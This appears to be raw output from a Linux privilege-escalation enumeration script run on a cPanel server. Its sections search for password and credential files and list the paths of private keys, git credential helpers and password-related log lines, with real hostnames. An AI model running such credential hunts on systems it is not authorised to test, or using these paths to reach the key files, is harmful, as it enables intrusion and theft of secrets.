/usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_stages_history_long' 
/usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 
'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for 
table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/start_server_no_stages_history.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_stages_history_long.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_statements_history.result:mysql 
/usr/share/mysql-test/suite/perfschema/r/start_server_no_statements_history_long.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_waits_history.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_waits_history_long.result:mysql /usr/share/zsh/5.0.2/functions/_history:SUFFIX="$SUFFIX$ISUFFIX" /usr/share/zsh/5.0.2/functions/_history_complete_word:_history_complete_word "$@" /usr/share/zsh/5.0.2/functions/_history_modifiers: "r:root - strip suffix" ╔══════════╣ Searching passwords in config PHP files  ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /etc/apache2/conf.d/ssl.key /etc/apache2/conf.d/ssl.key/server.key /etc/dovecot/ssl/dovecot.key /etc/exim.key /etc/named.iscdlv.key /etc/named.root.key /etc/openldap/certs/password /etc/pam.d/password-auth /etc/pam.d/password-auth-ac /etc/pki/tls/private/localhost.key /etc/rndc.key /etc/ssl/private/ns1.aarms.com.key /etc/ssl/private/ns1.miisky.com.key /etc/trusted-key.key /opt/cpanel/ea-openssl/etc/pki/tls/man/man3/des_read_2passwords.3 /opt/cpanel/ea-openssl/etc/pki/tls/man/man3/des_read_password.3 /opt/cpanel/ea-php55/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php56/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php70/root/usr/include/php/ext/standard/php_password.h /usr/bin/systemd-ask-password /usr/bin/systemd-tty-ask-password-agent /usr/include/mysql/mysql/get_password.h /usr/include/mysql/mysql/plugin_validate_password.h /usr/include/mysql/plugin_validate_password.h /usr/lib/grub/i386-pc/legacy_password_test.mod /usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.222.b10-0.el7_6.x86_64/jre/lib/management/jmxremote.password.template /usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path /usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.path 
/usr/lib/systemd/system/systemd-ask-password-console.service /usr/lib/systemd/system/systemd-ask-password-plymouth.path /usr/lib/systemd/system/systemd-ask-password-plymouth.service #)There are more creds/passwds files in the previous parent folder /usr/lib64/mysql/plugin/debug/validate_password.so /usr/lib64/mysql/plugin/validate_password.so /usr/lib64/pppd/2.4.5/passwordfd.so /usr/libexec/dovecot/checkpassword-reply /usr/libexec/git-core/git-credential /usr/libexec/git-core/git-credential-cache /usr/libexec/git-core/git-credential-cache--daemon /usr/libexec/git-core/git-credential-store #)There are more creds/passwds files in the previous parent folder /usr/local/src/csf/ui/server.key /usr/sbin/grub2-setpassword /usr/share/augeas/lenses/dist/jmxpassword.aug /usr/share/doc/git-1.8.3.1/contrib/credential /usr/share/doc/git-1.8.3.1/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c /usr/share/doc/git-1.8.3.1/contrib/credential/netrc/git-credential-netrc /usr/share/doc/git-1.8.3.1/contrib/credential/osxkeychain/git-credential-osxkeychain.c /usr/share/doc/git-1.8.3.1/contrib/credential/wincred/git-credential-wincred.c /usr/share/doc/git-1.8.3.1/git-credential-cache--daemon.html /usr/share/doc/git-1.8.3.1/git-credential-cache--daemon.txt /usr/share/doc/git-1.8.3.1/git-credential-cache.html /usr/share/doc/git-1.8.3.1/git-credential-cache.txt #)There are more creds/passwds files in the previous parent folder /usr/share/doc/git-1.8.3.1/technical/api-credentials.txt /usr/share/doc/libmcrypt-devel-2.5.8/README.key /usr/share/doc/lynx-2.8.8/docs/djgpp.key /usr/share/doc/lynx-2.8.8/docs/pdcurses.key /usr/share/doc/lynx-2.8.8/docs/slang.key ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs  ╔══════════╣ Searching passwords inside logs (limit 70) /var/log/boot.log-20250517:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. 
/var/log/boot.log-20250517:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250518:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250518:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250519:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250519:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250520:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250520:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250521:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250521:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250522:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250522:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250523:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250523:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/cpanel-install.log:2017-08-07 19:35:53 889 (DEBUG): Removing suid from /usr/sbin/unix_chkpwd /var/log/cpanel-install.log:2017-08-07 19:35:53 889 (DEBUG): Skipping suid removal for /usr/bin/gpasswd /var/log/cpanel-install.log:2017-08-07 19:35:53 889 (DEBUG): Skipping suid removal for /usr/bin/passwd /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): *** Done unify_virtual_user_password_strengths *** /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): *** Running unify_virtual_user_password_strengths *** /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): Completed Task: “11.54.0.0_password_strength_settings”. /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): FTP password files updated. 
/var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): FTP vhost passwords synced /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): Running Task: “11.54.0.0_password_strength_settings”. /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): Updating FTP passwords for all users /var/log/cpanel-install.log:2017-08-07 19:48:43 219 (DEBUG): [2017-08-07 19:48:43 +0530] [28243] Locking password for user ctrl4c. /var/log/cpanel-install.log:2017-08-07 19:48:43 219 (DEBUG): [2017-08-07 19:48:43 +0530] [28243] passwd: Success /var/log/cpanel-install.log:2017-08-07 19:59:11 1138 ( INFO): 4. Enter your root password in the Password text box /var/log/cpanel-install.log:[2017-08-07 19:05:00 +0530] Set permissions on /usr/local/cpanel/base/backend/passwordstrength.cgi-cpanelsync to 0755 /var/log/cpanel-install.log:[2017-08-07 19:16:08 +0530] Set permissions on /usr/local/cpanel/bin/jail_safe_passwd-cpanelsync to 0755 /var/log/cpanel-install.log:[2017-08-07 19:26:55 +0530] cpanel-perl-524-Crypt-Passwd-XS-0.601-1.cp1162.x86_64 /var/log/cpanel-install.log:[2017-08-07 19:29:51 +0530] /usr/bin/mysqladmin -u root -h ns1.aarms.com password 'new-password' /var/log/cpanel-install.log:[2017-08-07 19:29:51 +0530] /usr/bin/mysqladmin -u root password 'new-password' /var/log/cpanel-install.log:[2017-08-07 19:29:51 +0530] PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER ! 
/var/log/elevate-cpanel.log:* 01-22:27:51 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 01-22:28:18 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 01-22:28:43 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 01-22:29:03 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 01-22:30:40 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:27:59 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:28:29 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:28:32 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:30:20 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:31:21 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:27:58 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:28:03 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:28:07 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:28:32 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:30:25 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:27:58 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:28:13 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:28:56 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:29:29 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:30:17 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:27:59 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:28:03 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:29:02 (3372) [INFO] passwd.x86_64 0.79-6.el7 base 
 /var/log/elevate-cpanel.log:* 05-22:29:23 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:32:18 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:28:09 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:28:11 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:28:14 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:28:24 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:31:48 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:28:14 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:28:35 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:28:44 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:28:56 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:34:43 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 08-22:28:28 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 08-22:28:31 (3777) [INFO] passwd.x86_64 0.79-6.el7 base   ╔════════════════╗ ════════════════════════════════╣ API Keys Regex ╠════════════════════════════════  ╚════════════════╝ Regexes to search for API keys aren't activated, use param '-r'